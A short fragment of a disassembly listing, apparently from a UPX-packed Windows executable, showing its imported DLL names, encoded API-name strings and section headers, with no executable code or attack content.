aMsvcrt_dll db 'msvcrt.dll',0
aShell32_dll_0 db 'shell32.dll',0
aUser32_dll_0 db 'user32.dll',0
aWsock32_dll db 'wsock32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 74654700h, 636F7250h
dd 72646441h, 737365h, 78450000h, 72507469h, 7365636Fh
dd 73h, 74654700h, 72657355h, 656D614Eh, 41h, 656D6974h
dd 53000000h, 61684348h, 4E65676Eh, 6669746Fh, 79h, 646E6946h
dd 646E6957h, 41776Fh, 4D000000h, 61737365h, 6F426567h
dd 4178h, 39Fh dup(0)
UPX2 ends
; Section 4. (virtual address 00084000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00084000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 484000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start